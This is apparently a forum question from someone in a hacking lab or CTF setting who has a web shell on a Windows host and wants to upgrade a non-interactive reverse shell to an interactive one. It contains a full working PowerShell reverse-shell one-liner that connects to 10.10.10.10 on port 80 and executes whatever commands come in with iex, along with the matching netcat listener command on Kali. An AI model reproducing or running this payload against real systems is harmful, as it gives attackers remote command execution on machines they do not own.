I have web shell that I managed to convert to reverse shell by running:
On Windows: $client = New-Object System.Net.Sockets.TCPClient(“10.10.10.10”,80);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
On Kali: sudo rlwrap nc -nvlp 80
However this is non-interactive shell. Running
sc query or sc qc hangs the shell (luckily systeminfo and whoami /priv work).
What methods of upgrading “dump” shell to interactive shell exist on Windows?